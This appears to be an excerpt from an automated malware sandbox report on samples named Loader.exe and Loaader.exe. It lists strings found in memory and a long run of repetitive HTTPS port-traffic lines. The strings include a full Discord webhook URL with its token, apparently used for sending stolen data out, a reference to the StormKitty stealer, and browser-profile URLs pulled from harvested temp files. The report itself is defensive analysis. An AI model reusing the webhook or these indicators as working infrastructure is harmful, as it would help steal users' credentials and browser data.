Source: ce3ed400-d1e84918ad678b08d2a369a3-Latest.log.21.dr	String found in binary or memory: https://discord.com/api/webhooks/895657579101958174/9Z8CPsHdivzzExezi2PenJZuA1sRTvhR7zSiHiSBhPgUVEAa
Source: Loader.exe, 00000014.00000002.2662012790.000000001294A000.00000004.00000800.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3394522285.00000000139A5000.00000004.00000800.00020000.00000000.sdmp, tmpAA25.tmp.dat.20.dr, tmp5D77.tmp.dat.21.dr, tmp5E08.tmp.dat.21.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Loader.exe, 00000014.00000002.2662012790.000000001294A000.00000004.00000800.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3394522285.00000000139A5000.00000004.00000800.00020000.00000000.sdmp, tmpAA25.tmp.dat.20.dr, tmp5D77.tmp.dat.21.dr, tmp5E08.tmp.dat.21.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Loader.exe, 00000014.00000002.2662012790.000000001294A000.00000004.00000800.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3394522285.00000000139A5000.00000004.00000800.00020000.00000000.sdmp, tmpAA25.tmp.dat.20.dr, tmp5D77.tmp.dat.21.dr, tmp5E08.tmp.dat.21.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Loader.exe, 00000014.00000002.2527964251.00000000029B9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/LimerBoy/StormKitty
Source: powershell.exe, 00000030.00000002.2306321177.0000013E8DC08000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000019.00000002.2270356962.0000015CC1787000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2270201897.0000019134E1E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.2307883969.0000029A0BAA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000030.00000002.2306321177.0000013E8F738000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000019.00000002.2776917070.0000015CD05B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2776917070.0000015CD06F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2740239857.0000019143C44000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2740239857.0000019143D87000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.3023734848.0000029A19F09000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.3023734848.0000029A19DC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000030.00000002.3028687529.0000013E9DB9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000030.00000002.3028687529.0000013E9DA57000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: tmp5E28.tmp.dat.21.dr	String found in binary or memory: https://support.mozilla.org
Source: tmp5E28.tmp.dat.21.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: tmp5E28.tmp.dat.21.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
Source: Loader.exe, 00000014.00000002.2824829342.000000001D160000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://urn.to/r/sds_see
Source: Loaader.exe, 00000015.00000002.3282228143.0000000003177000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://user-images.githubusercontent.com/45857590/138568746-1a5578fe-f51b-4114-bcf2-e374535f8488.pn
Source: Loader.exe, 00000014.00000002.2662012790.000000001294A000.00000004.00000800.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3394522285.00000000139A5000.00000004.00000800.00020000.00000000.sdmp, tmpAA25.tmp.dat.20.dr, tmp5D77.tmp.dat.21.dr, tmp5E08.tmp.dat.21.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: Loader.exe, 00000014.00000002.2662012790.000000001294A000.00000004.00000800.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3394522285.00000000139A5000.00000004.00000800.00020000.00000000.sdmp, tmpAA25.tmp.dat.20.dr, tmp5D77.tmp.dat.21.dr, tmp5E08.tmp.dat.21.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: tmp5E28.tmp.dat.21.dr	String found in binary or memory: https://www.mozilla.org
Source: tmp5E28.tmp.dat.21.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: tmp5E28.tmp.dat.21.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: Loaader.exe, 00000015.00000002.3282228143.000000000333D000.00000004.00000800.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3282228143.0000000003335000.00000004.00000800.00020000.00000000.sdmp, History.txt.21.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/)
Source: Loaader.exe, 00000015.00000002.3394522285.0000000013EDE000.00000004.00000800.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3394522285.00000000139C6000.00000004.00000800.00020000.00000000.sdmp, tmp5FC1.tmp.dat.21.dr, tmp5E28.tmp.dat.21.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: tmp5E28.tmp.dat.21.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: Loaader.exe, 00000015.00000002.3394522285.0000000013EDE000.00000004.00000800.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3394522285.00000000139C6000.00000004.00000800.00020000.00000000.sdmp, tmp5FC1.tmp.dat.21.dr, tmp5E28.tmp.dat.21.dr	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: Loaader.exe, 00000015.00000002.3394522285.0000000013EDE000.00000004.00000800.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3394522285.00000000139C6000.00000004.00000800.00020000.00000000.sdmp, tmp5FC1.tmp.dat.21.dr, tmp5E28.tmp.dat.21.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: Loader.exe, 00000014.00000002.2824829342.000000001D160000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.newtonsoft.com/jsonschema
Source: Loader.exe, 00000014.00000002.2824829342.000000001D160000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson

Source: unknown	Network traffic detected: HTTP traffic on port 61247 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61029 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61304 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61201 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61224 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61282 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61006 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61109 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61271 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61076 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61133 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61179 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61018 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61236 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61087 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61144 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61190 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61235 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61258 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61178 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61065 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61315 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61088 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61122 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61017 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61145 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61294 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61326 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61099 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61040 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61156 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61269 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61283 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61213 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61108 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 61272 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61054 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61134 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61157 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61192 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61119 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61019 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61317 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61097 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61074 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61246 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61063 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61042 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61211 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61123 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61257 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61295 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61245 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61098 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61268 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61008 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61284 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61212 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61107 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61168 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61053 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61223 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61296 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61273 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61305 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61086 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61118 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61191 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61135 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61234 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61316 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61146 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61180 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61021 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61285 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61105
Source: unknown	Network traffic detected: HTTP traffic on port 61044 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61226
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61106
Source: unknown	Network traffic detected: HTTP traffic on port 61067 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61210 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61227
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61107
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61228
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61108
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61229
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61109
Source: unknown	Network traffic detected: HTTP traffic on port 61233 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61220
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61100
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61221
Source: unknown	Network traffic detected: HTTP traffic on port 61313 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61101
Source: unknown	Network traffic detected: HTTP traffic on port 61124 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61222
Source: unknown	Network traffic detected: HTTP traffic on port 61256 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61223
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61103
Source: unknown	Network traffic detected: HTTP traffic on port 61147 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61224
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61104
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61225
Source: unknown	Network traffic detected: HTTP traffic on port 61055 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61221 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61158 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61324 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61193 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61267 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61116
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61237
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61117
Source: unknown	Network traffic detected: HTTP traffic on port 61209 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61238
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61118
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61239
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61119
Source: unknown	Network traffic detected: HTTP traffic on port 61182 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61230
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61110
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61231
Source: unknown	Network traffic detected: HTTP traffic on port 61106 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61111
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61232
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61112
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61233
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61113
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61234
Source: unknown	Network traffic detected: HTTP traffic on port 61274 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61235
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61115
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61236
Source: unknown	Network traffic detected: HTTP traffic on port 61079 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61222 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61250
Source: unknown	Network traffic detected: HTTP traffic on port 61159 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61136 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61117 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61006
Source: unknown	Network traffic detected: HTTP traffic on port 61020 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61127
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61248
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61128
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61249
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61008
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61129
Source: unknown	Network traffic detected: HTTP traffic on port 61091 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61240
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61120
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61241
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61121
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61242
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61122
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61243
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61123
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61244
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61124
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61245
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61125
Source: unknown	Network traffic detected: HTTP traffic on port 61181 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61246
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61126
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61247
Source: unknown	Network traffic detected: HTTP traffic on port 61244 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61260
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61140
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61261
Source: unknown	Network traffic detected: HTTP traffic on port 61301 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61170 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61286 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61017
Source: unknown	Network traffic detected: HTTP traffic on port 61068 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61138
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61259
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61018
Source: unknown	Network traffic detected: HTTP traffic on port 61043 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61139
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61019
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61130
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61251
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61131
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61252
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61132
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61253
Source: unknown	Network traffic detected: HTTP traffic on port 61255 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61133
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61254
Source: unknown	Network traffic detected: HTTP traffic on port 61312 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61013
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61134
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61255
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61135
Source: unknown	Network traffic detected: HTTP traffic on port 61125 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61014
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61256
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61015
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61136
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61257
Source: unknown	Network traffic detected: HTTP traffic on port 61297 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61016
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61137
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61258
Source: unknown	Network traffic detected: HTTP traffic on port 61077 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61220 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61266 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61243 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61303
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61304
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61305
Source: unknown	Network traffic detected: HTTP traffic on port 61105 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61306
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61307
Source: unknown	Network traffic detected: HTTP traffic on port 61208 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61308
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61309
Source: unknown	Network traffic detected: HTTP traffic on port 61183 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61034 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61275 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61298 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61300
Source: unknown	Network traffic detected: HTTP traffic on port 61160 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61301
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61302
Source: unknown	Network traffic detected: HTTP traffic on port 61116 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61219 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61303 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61172 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61137 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61314
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61315
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61316
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61317
Source: unknown	Network traffic detected: HTTP traffic on port 61232 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61318
Source: unknown	Network traffic detected: HTTP traffic on port 61066 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61319
Source: unknown	Network traffic detected: HTTP traffic on port 61314 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61310
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61311
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61312
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61313
Source: unknown	Network traffic detected: HTTP traffic on port 61325 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61302 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61194 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61171 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61287 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61204
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61325
Source: unknown	Network traffic detected: HTTP traffic on port 61126 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61205
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61326
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61206
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61207
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61208
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61209
Source: unknown	Network traffic detected: HTTP traffic on port 61231 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61254 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61320
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61321
Source: unknown	Network traffic detected: HTTP traffic on port 61149 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61201
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61322
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61323
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61203
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61324
Source: unknown	Network traffic detected: HTTP traffic on port 61078 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61265 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61215
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61216
Source: unknown	Network traffic detected: HTTP traffic on port 61104 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61217
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61218
Source: unknown	Network traffic detected: HTTP traffic on port 61089 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61219
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61210
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61211
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61212
Source: unknown	Network traffic detected: HTTP traffic on port 61033 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61213
Source: unknown	Network traffic detected: HTTP traffic on port 61276 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61214
Source: unknown	Network traffic detected: HTTP traffic on port 61115 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61190
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61191
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61071
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61192
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61193
Source: unknown	Network traffic detected: HTTP traffic on port 61058 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61194
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61073
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61074
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61195
Source: unknown	Network traffic detected: HTTP traffic on port 61196 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61173 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61150 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61138 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61093 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61185
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61065
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61186
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61066
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61187
Source: unknown	Network traffic detected: HTTP traffic on port 61218 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61067
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61188
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61068
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61189
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61069
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61082
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61083
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61084
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61085
Source: unknown	Network traffic detected: HTTP traffic on port 61242 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61229 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61288 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61127 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61196
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61076
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61197
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61077
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61198
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61078
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61199
Source: unknown	Network traffic detected: HTTP traffic on port 61253 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61079
Source: unknown	Network traffic detected: HTTP traffic on port 61161 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61299 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61310 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61091
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61092
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61093
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61094
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61096
Source: unknown	Network traffic detected: HTTP traffic on port 61241 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61264 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61103 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61321 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61086
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61087
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61088
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61089
Source: unknown	Network traffic detected: HTTP traffic on port 61162 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61277 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61139 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61082 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61309 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61195 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61071 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61207 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61230 -> 443
